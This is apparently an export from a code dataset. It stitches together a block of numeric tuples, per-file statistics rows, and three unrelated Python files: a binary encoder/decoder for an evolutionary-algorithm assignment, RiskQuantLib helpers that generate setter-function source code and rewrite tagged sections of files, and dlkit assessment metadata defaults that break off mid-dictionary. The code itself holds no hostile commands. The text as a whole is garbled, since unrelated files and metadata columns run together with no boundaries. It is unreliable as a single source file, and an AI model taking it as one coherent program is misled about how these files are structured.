(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47),
(20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (20, 47), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49),
(21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (21, 49), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51), (22, 51),
(22, 51), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (23, 53),
(23, 53), (23, 53), (23, 53), (23, 53), (23, 53), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55), (24, 55),
(24, 55), (24, 55), (24, 55), (24, 55), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (25, 57),
(25, 57), (25, 57), (25, 57), (25, 57), (25, 57), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59), (26, 59),
(26, 59), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61),
(27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (27, 61), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63),
(28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (28, 63), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65), (29, 65),
(29, 65))
| 68.706806
| 77
| 0.385202
| 2,337
| 13,123
| 2.161746
| 0.065469
| 0.051465
| 0.07601
| 0.101346
| 0.827395
| 0.820269
| 0.820269
| 0.820269
| 0.820269
| 0.820269
| 0
| 0.427121
| 0.257106
| 13,123
| 190
| 78
| 69.068421
| 0.091086
| 0.135259
| 0
| 0.771242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
9452ce29e9fc9dedc22602cc6334d4cdc769ff19
| 4,624
|
py
|
Python
|
dz/dz-04/src/evolution/encoding.py
|
Yalfoosh/AIPR
|
cd89e562682e7f868d56db2414a92c2d14d8ad8d
|
[
"Apache-2.0"
] | null | null | null |
dz/dz-04/src/evolution/encoding.py
|
Yalfoosh/AIPR
|
cd89e562682e7f868d56db2414a92c2d14d8ad8d
|
[
"Apache-2.0"
] | null | null | null |
dz/dz-04/src/evolution/encoding.py
|
Yalfoosh/AIPR
|
cd89e562682e7f868d56db2414a92c2d14d8ad8d
|
[
"Apache-2.0"
] | null | null | null |
import copy
from typing import Tuple, Union
import numpy as np
from .module import Module
from .utils import bin2dec_vector, dec2bin_vector
class BinaryEncoder(Module):
@staticmethod
def __check_init_args(
dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
) -> Tuple[int, np.ndarray]:
if not isinstance(dim, int):
raise TypeError(
f"Expected argument dim to be an int, instead it is {type(dim)}."
)
if dim < 1:
raise ValueError(
f"Expected argument dim to be a positive integer, instead it is {dim}."
)
if not isinstance(interval, tuple):
try:
interval = tuple(interval)
except Exception:
raise TypeError(
"Expected argument interval to be a tuple, instead it is "
f"{type(interval)}"
)
if len(interval) < 1:
raise ValueError("Expected argument interval to be non-empty.")
if len(interval) < 2:
interval = (interval[0], 0) if interval < 0 else (0, interval[0])
interval = interval[:2]
if interval[0] > interval[1]:
raise ValueError(
"Expected argument interval to have a first item smaller than the "
f"second one, instead it is {interval}."
)
interval = np.array(interval, dtype=np.float)
return dim, interval
def __init__(
self, dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
):
self.__dim, self.__interval = self.__check_init_args(dim=dim, interval=interval)
self.__max_value = int(2 ** dim) - 1
self.__quantum = (interval[1] - interval[0]) / self.max_value
@property
def dim(self):
return self.__dim
@property
def interval(self):
return self.__interval
@property
def quantum(self):
return self.__quantum
@property
def max_value(self):
return self.__max_value
def _input_to_int(self, x) -> int:
return np.maximum(
0, np.minimum(self.max_value, (x - self.interval[0]) / self.quantum)
).astype(np.int)
def apply(self, x):
x_int = self._input_to_int(x)
return dec2bin_vector(x_int, self.dim)
def __str__(self):
return f"BinaryEncoder({self.dim} bit, {self.interval})"
class BinaryDecoder(Module):
@staticmethod
def __check_init_args(
dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
) -> Tuple[int, np.ndarray]:
if not isinstance(dim, int):
raise TypeError(
f"Expected argument dim to be an int, instead it is {type(dim)}."
)
if dim < 1:
raise ValueError(
f"Expected argument dim to be a positive integer, instead it is {dim}."
)
if not isinstance(interval, tuple):
try:
interval = tuple(interval)
except Exception:
raise TypeError(
"Expected argument interval to be a tuple, instead it is "
f"{type(interval)}"
)
if len(interval) < 1:
raise ValueError("Expected argument interval to be non-empty.")
if len(interval) < 2:
interval = (interval[0], 0) if interval < 0 else (0, interval[0])
interval = interval[:2]
if interval[0] > interval[1]:
raise ValueError(
"Expected argument interval to have a first item smaller than the "
f"second one, instead it is {interval}."
)
interval = np.array(interval, dtype=np.float)
return dim, interval
def __init__(
self, dim: int, interval: Union[Tuple[Union[float, int], Union[float, int]]]
):
self.__dim, self.__interval = self.__check_init_args(dim=dim, interval=interval)
self.__max_value = int(2 ** dim) - 1
self.__quantum = (interval[1] - interval[0]) / self.max_value
@property
def dim(self):
return self.__dim
@property
def interval(self):
return self.__interval
@property
def max_value(self):
return self.__max_value
@property
def quantum(self):
return self.__quantum
def apply(self, x):
x_int = bin2dec_vector(x)
return (x_int * self.quantum) + self.interval[0]
def __str__(self):
return f"BinaryDecoder({self.dim} bit, {self.interval})"
| 28.54321
| 88
| 0.570502
| 554
| 4,624
| 4.604693
| 0.144404
| 0.042336
| 0.040768
| 0.061152
| 0.857703
| 0.827127
| 0.813799
| 0.787534
| 0.787534
| 0.759702
| 0
| 0.011912
| 0.328287
| 4,624
| 161
| 89
| 28.720497
| 0.809401
| 0
| 0
| 0.793388
| 0
| 0
| 0.169983
| 0.010381
| 0
| 0
| 0
| 0
| 0
| 1
| 0.140496
| false
| 0
| 0.041322
| 0.090909
| 0.322314
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
846e9b279c5c949fb081082e73654a4ef241f44d
| 14,209
|
py
|
Python
|
RiskQuantLib/Build/buildFuction.py
|
SyuyaMurakami/RiskQuantLib-Doc
|
2503befc24c2e422e51f8b9f468c8d8439e11c65
|
[
"MIT"
] | 1
|
2021-12-29T12:18:45.000Z
|
2021-12-29T12:18:45.000Z
|
RiskQuantLib/Build/buildFuction.py
|
SyuyaMurakami/RiskQuantLib-Doc
|
2503befc24c2e422e51f8b9f468c8d8439e11c65
|
[
"MIT"
] | null | null | null |
RiskQuantLib/Build/buildFuction.py
|
SyuyaMurakami/RiskQuantLib-Doc
|
2503befc24c2e422e51f8b9f468c8d8439e11c65
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
#coding = utf-8
def buildStringFunction(variableNameString:str):
"""
buildStringFunction(variableNameString:str) is a function to automatically build a set function,
given the variable type as 'String'.
This function returns a codeBuilder object.
Parameters
----------
variableNameString : str
The variable name you want to use.
This name will be used as attribute name of class.
Returns
-------
code : codeBuilder Object
"""
from RiskQuantLib.Tool.codeBuilderTool import codeBuilder
code = codeBuilder(indent=4)
code.add_line("def set"+variableNameString[0].capitalize()+variableNameString[1:]+"(self, "+variableNameString+"String):")
code.indent()
vars_code = code.add_section()
code.add_line("self."+variableNameString+" = "+variableNameString+"String")
code.dedent()
code.get_globals()
return code
def buildNumberFunction(variableNameString:str):
"""
buildNumberFunction(variableNameString:str) is a function to automatically build a set function,
given the variable type as 'Number'.
This function will import a number instance from RiskQuantLib.Property.NumberProperty.numberProperty,
and returns a codeBuilder object.
Parameters
----------
variableNameString : str
The variable name you want to use.
This name will be used as attribute name of class.
Returns
-------
code : codeBuilder Object
"""
from RiskQuantLib.Tool.codeBuilderTool import codeBuilder
code = codeBuilder(indent=4)
code.add_line("def set"+variableNameString[0].capitalize()+variableNameString[1:]+"(self, "+variableNameString+"Num):")
code.indent()
vars_code = code.add_section()
code.add_line("from RiskQuantLib.Property.NumberProperty.numberProperty import numberProperty")
code.add_line("if not hasattr(self, '_"+variableNameString+"'):")
code.indent()
code.add_line("self._"+variableNameString+" = numberProperty("+variableNameString+"Num)")
code.add_line("self._"+variableNameString+".setBelongTo(self,'"+variableNameString+"')")
code.add_line("self."+variableNameString+" = self._"+variableNameString+".value")
code.dedent()
code.add_line("else:")
code.indent()
code.add_line("self._"+variableNameString+".setValue("+variableNameString+"Num)")
code.add_line("self."+variableNameString+" = self._"+variableNameString+".value")
code.dedent()
code.dedent()
code.get_globals()
return code
def buildBaseFunction(variableNameString:str):
"""
buildBaseFunction(variableNameString:str) is a function to automatically build a set function,
given the variable type as 'Any'.
This function will import a property instance from RiskQuantLib.Property.base,
and returns a codeBuilder object.
Parameters
----------
variableNameString : str
The variable name you want to use.
This name will be used as attribute name of class.
Returns
-------
code : codeBuilder Object
"""
from RiskQuantLib.Tool.codeBuilderTool import codeBuilder
code = codeBuilder(indent=4)
code.add_line("def set"+variableNameString[0].capitalize()+variableNameString[1:]+"(self, "+variableNameString+"):")
code.indent()
vars_code = code.add_section()
code.add_line("from RiskQuantLib.Property.base import base")
code.add_line("if not hasattr(self, '_"+variableNameString+"'):")
code.indent()
code.add_line("self._"+variableNameString+" = base("+variableNameString+")")
code.add_line("self._" + variableNameString + ".setBelongTo(self,'" + variableNameString + "')")
code.add_line("self."+variableNameString+" = self._"+variableNameString+".value")
code.dedent()
code.add_line("else:")
code.indent()
code.add_line("self._"+variableNameString+".setValue("+variableNameString+")")
code.add_line("self."+variableNameString+" = self._"+variableNameString+".value")
code.dedent()
code.dedent()
code.get_globals()
return code
def buildSelfDefinedTypeFunction(variableNameString:str, variableTypeString : str):
"""
buildSelfDefinedTypeFunction(variableNameString:str, variableTypeString : str)
is a function to automatically build a set function,
given the variable type as self-defined string.
This function will import a property instance from RiskQuantLib.Property.selfDefinedType,
and returns a codeBuilder object.
Parameters
----------
variableNameString : str
The variable name you want to use.
This name will be used as attribute name of class.
variableTypeString : str
The variable type you want to set your variable to, usually, it should be
'String', 'Number' or 'Any', but after defining your own type class, you
can use it as a variable type.
Returns
-------
code : codeBuilder Object
"""
c_variableTypeString = variableTypeString[0].capitalize()+variableTypeString[1:]
from RiskQuantLib.Tool.codeBuilderTool import codeBuilder
code = codeBuilder(indent=4)
code.add_line("def set"+variableNameString[0].capitalize()+variableNameString[1:]+"(self, "+variableNameString+"):")
code.indent()
vars_code = code.add_section()
code.add_line("from RiskQuantLib.Property."+c_variableTypeString+"."+variableTypeString+" import "+variableTypeString)
code.add_line("if not hasattr(self, '_"+variableNameString+"'):")
code.indent()
code.add_line("self._"+variableNameString+" = "+variableTypeString+"("+variableNameString+")")
code.add_line("self._" + variableNameString + ".setBelongTo(self,'" + variableNameString + "')")
code.add_line("self."+variableNameString+" = self._"+variableNameString+".value")
code.dedent()
code.add_line("else:")
code.indent()
code.add_line("self._"+variableNameString+".setValue("+variableNameString+")")
code.add_line("self."+variableNameString+" = self._"+variableNameString+".value")
code.dedent()
code.dedent()
code.get_globals()
return code
def commitObjectFunctionBuild(codeList:list,sourceFilePath:str):
"""
commitObjectFunctionBuild(codeList:list,sourceFilePath:str) is a function to commit creations of variable set function.
This function clear any contents between '#-<Begin>' and '#-<End>', replace it with new source code generated by 'codeList',
Parameters
----------
codeList : list
A list of codeBuilder objects, contains multiple of set functions.
sourceFilePath : str
The file where your want to rewrite set function.
Returns
-------
None
"""
sourceCodeList = [i.python_source for i in codeList]
sourceCode = "".join(sourceCodeList)
with open(sourceFilePath, 'r') as f:
content = f.read()
if content.find('#-<Begin>') == -1 or content.find('#-<End>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<Begin>')[0]
ender = content.split('#-<End>')[-1]
newContent = former + '#-<Begin>\n' + sourceCode + ' #-<End>\n\t' + ender
with open(sourceFilePath, 'w') as f:
f.truncate() # clear all contents of file
f.write(newContent.strip(' ').strip('\t\n'))
def buildListSetFunction1D(variableNameString:str,variableType:str = 'Base'):
"""
buildListSetFunction1D(variableNameString:str,variableType:str = 'Base') is a function
to generate set function of RiskQuantLib list object,
given the condition that variable is a one-dimension variable.
This function returns a codeBuilder object
Parameters
----------
variableNameString : str
The variable name you used.
variableType : str
The variable type you specified.
Returns
-------
code : codeBuilder object
"""
defaultValueDict = {
"Str":"''",
"Num":"np.nan",
"Base":"np.nan"
}
if variableType not in defaultValueDict.keys():
print("Variable type must be set as 'Str', 'Num' or 'Base'")
exit(-1)
else:
from RiskQuantLib.Tool.codeBuilderTool import codeBuilder
code = codeBuilder(indent=4)
code.add_line("def set"+variableNameString[0].capitalize()+variableNameString[1:]+"(self,codeSeries,"+variableNameString+"Series,byAttr='code',update=False):")
code.indent()
vars_code = code.add_section()
code.add_line(variableNameString+"Dict = dict(zip(codeSeries,"+variableNameString+"Series))")
code.add_line("if byAttr=='code' and not update:")
code.indent()
code.add_line("[i.set"+variableNameString[0].capitalize()+variableNameString[1:]+"("+variableNameString+"Dict[i.code]) if i.code in "+variableNameString+"Dict.keys() else i.set"+variableNameString[0].capitalize() + variableNameString[1:]+"("+defaultValueDict[variableType]+") for i in self.all]")
code.dedent()
code.add_line("elif not update:")
code.indent()
code.add_line("[i.set"+variableNameString[0].capitalize()+variableNameString[1:]+"("+variableNameString+"Dict[getattr(i,byAttr)]) if hasattr(i,byAttr) and getattr(i,byAttr) in "+variableNameString+"Dict.keys() else i.set"+variableNameString[0].capitalize() + variableNameString[1:]+"("+defaultValueDict[variableType]+") for i in self.all]")
code.dedent()
code.add_line("else:")
code.indent()
code.add_line("[i.set"+variableNameString[0].capitalize()+variableNameString[1:]+"("+variableNameString+"Dict[getattr(i,byAttr)]) if hasattr(i,byAttr) and getattr(i,byAttr) in "+variableNameString+"Dict.keys() else None for i in self.all]")
code.dedent()
code.dedent()
code.get_globals()
return code
def buildListSetFunction2D(variableNameString:str):
"""
buildListSetFunction2D(variableNameString:str) is a function
to generate set function of RiskQuantLib list object,
given the condition that variable is a two-dimension variable, like a time series.
This function returns a codeBuilder object
Parameters
----------
variableNameString : str
The variable name you used.
Returns
-------
code : codeBuilder object
"""
from RiskQuantLib.Tool.codeBuilderTool import codeBuilder
code = codeBuilder(indent=4)
code.add_line("def set"+variableNameString[0].capitalize()+variableNameString[1:]+"(self,"+variableNameString+"DataFrame,byAttr='code',update=False):")
code.indent()
vars_code = code.add_section()
code.add_line("import pandas as pd")
code.add_line(variableNameString+"CodeList = "+variableNameString+"DataFrame.columns.to_list()")
code.add_line("if byAttr=='code' and not update:")
code.indent()
code.add_line("[i.set"+variableNameString[0].capitalize()+variableNameString[1:]+"("+variableNameString+"DataFrame[i.code]) if hasattr(i,'code') and i.code in "+variableNameString+"CodeList else i.set"+variableNameString[0].capitalize()+variableNameString[1:]+"(pd.Series()) for i in self.all]")
code.dedent()
code.add_line("elif not update:")
code.indent()
code.add_line("[i.set" + variableNameString[0].capitalize() + variableNameString[1:] + "(" + variableNameString + "DataFrame[getattr(i,byAttr)]) if hasattr(i,byAttr) and getattr(i,byAttr) in " + variableNameString + "CodeList else i.set" +variableNameString[0].capitalize() + variableNameString[1:] + "(pd.Series()) for i in self.all]")
code.dedent()
code.add_line("else:")
code.indent()
code.add_line("[i.set" + variableNameString[0].capitalize() + variableNameString[1:] + "(" + variableNameString + "DataFrame[getattr(i,byAttr)]) if hasattr(i,byAttr) and getattr(i,byAttr) in " + variableNameString + "CodeList else None for i in self.all]")
code.dedent()
code.dedent()
code.get_globals()
return code
def commitListFunctionBuild(codeList:list,sourceFilePath:str):
"""
commitListFunctionBuild(codeList:list,sourceFilePath:str) is a function to commit creations of set function
of RiskQuantLib list object.
This function clear any contents between '#-<Begin>' and '#-<End>', replace it with new source code generated by 'codeList',
Parameters
----------
codeList : list
A list of codeBuilder objects, contains multiple of list set functions.
sourceFilePath : str
The file where your want to rewrite set function.
Returns
-------
None
"""
sourceCodeList = [i.python_source for i in codeList]
sourceCode = "".join(sourceCodeList)
with open(sourceFilePath, 'r') as f:
content = f.read()
if content.find('#-<Begin>') == -1 or content.find('#-<End>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<Begin>')[0]
ender = content.split('#-<End>')[-1]
newContent = former + '#-<Begin>\n' + sourceCode + ' #-<End>\n\t' + ender
with open(sourceFilePath, 'w') as f:
f.truncate() # clear all contents of file
f.write(newContent.strip(' ').strip('\t\n'))
def clearBuiltFunction(sourceFilePath:str):
"""
clearBuiltFunction(sourceFilePath:str) is a function to clear creations of set function
of both RiskQuantLib instrument class object and instrument list class object.
This function clear any contents between '#-<Begin>' and '#-<End>',
Parameters
----------
sourceFilePath : str
The file where your want to clear all set functions.
Returns
-------
None
"""
with open(sourceFilePath, 'r') as f:
content = f.read()
if content.find('#-<Begin>') == -1 or content.find('#-<End>') == -1:
print("Source file must have a #-<Begin> and #-<End> tag to be built")
exit(-1)
former = content.split('#-<Begin>')[0]
ender = content.split('#-<End>')[-1]
newContent = former + '#-<Begin>\n #-<End>\n\t' + ender
with open(sourceFilePath, 'w') as f:
f.truncate() # clear all contents of file
f.write(newContent.strip(' ').strip('\t\n'))
| 37.589947
| 348
| 0.673024
| 1,611
| 14,209
| 5.882061
| 0.10987
| 0.038413
| 0.053398
| 0.054031
| 0.855741
| 0.804875
| 0.783347
| 0.780815
| 0.772794
| 0.772794
| 0
| 0.005269
| 0.185164
| 14,209
| 377
| 349
| 37.689655
| 0.81318
| 0.290942
| 0
| 0.761905
| 0
| 0.02381
| 0.220156
| 0.032051
| 0
| 0
| 0
| 0
| 0
| 1
| 0.053571
| false
| 0
| 0.059524
| 0
| 0.14881
| 0.02381
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
84748a9d96a65cdc0a73941ddbfeabe667857a74
| 14,652
|
py
|
Python
|
dlkit/json_/assessment/default_mdata.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 2
|
2018-02-23T12:16:11.000Z
|
2020-10-08T17:54:24.000Z
|
dlkit/json_/assessment/default_mdata.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 87
|
2017-04-21T18:57:15.000Z
|
2021-12-13T19:43:57.000Z
|
dlkit/json_/assessment/default_mdata.py
|
UOC/dlkit
|
a9d265db67e81b9e0f405457464e762e2c03f769
|
[
"MIT"
] | 1
|
2018-03-01T16:44:25.000Z
|
2018-03-01T16:44:25.000Z
|
"""JSON osid metadata configurations for assessment service."""
from .. import types
from ..primitives import Type
DEFAULT_LANGUAGE_TYPE = Type(**types.Language().get_type_data("DEFAULT"))
DEFAULT_SCRIPT_TYPE = Type(**types.Script().get_type_data("DEFAULT"))
DEFAULT_FORMAT_TYPE = Type(**types.Format().get_type_data("DEFAULT"))
DEFAULT_GENUS_TYPE = Type(**types.Genus().get_type_data("DEFAULT"))
def get_question_mdata():
"""Return default mdata map for Question"""
return {
'item': {
'element_label': {
'text': 'item',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
}
def get_answer_mdata():
"""Return default mdata map for Answer"""
return {
'item': {
'element_label': {
'text': 'item',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
}
def get_item_mdata():
"""Return default mdata map for Item"""
return {
'learning_objectives': {
'element_label': {
'text': 'learning objectives',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id[] object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': True,
'default_id_values': [],
'syntax': 'ID',
'id_set': [],
},
}
def get_assessment_mdata():
"""Return default mdata map for Assessment"""
return {
'rubric': {
'element_label': {
'text': 'rubric',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
'level': {
'element_label': {
'text': 'level',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
}
def get_assessment_offered_mdata():
"""Return default mdata map for AssessmentOffered"""
return {
'level': {
'element_label': {
'text': 'level',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_id_values': [''],
'syntax': 'ID',
'id_set': [],
},
'start_time': {
'element_label': {
'text': 'start time',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'enter a valid datetime object.',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'required': False,
'read_only': False,
'linked': False,
'array': False,
'default_date_time_values': [None],
'syntax': 'DATETIME',
'date_time_set': [],
},
'grade_system': {
'element_label': {
'text': 'grade system',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
'scriptTypeId': str(DEFAULT_SCRIPT_TYPE),
'formatTypeId': str(DEFAULT_FORMAT_TYPE),
},
'instructions': {
'text': 'accepts an osid.id.Id object',
'languageTypeId': str(DEFAULT_LANGUAGE_TYPE),
